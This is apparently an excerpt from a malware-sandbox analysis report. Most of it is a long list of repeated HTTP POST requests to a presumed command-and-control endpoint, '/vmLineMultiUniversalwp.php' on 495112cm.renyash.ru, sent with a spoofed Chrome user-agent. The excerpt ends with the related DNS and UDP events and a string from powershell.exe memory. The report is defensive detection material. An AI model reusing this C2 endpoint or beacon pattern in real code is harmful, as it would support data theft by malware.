                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2512Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2512Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 495112cm.renyash.ru
                                    Source: unknownHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
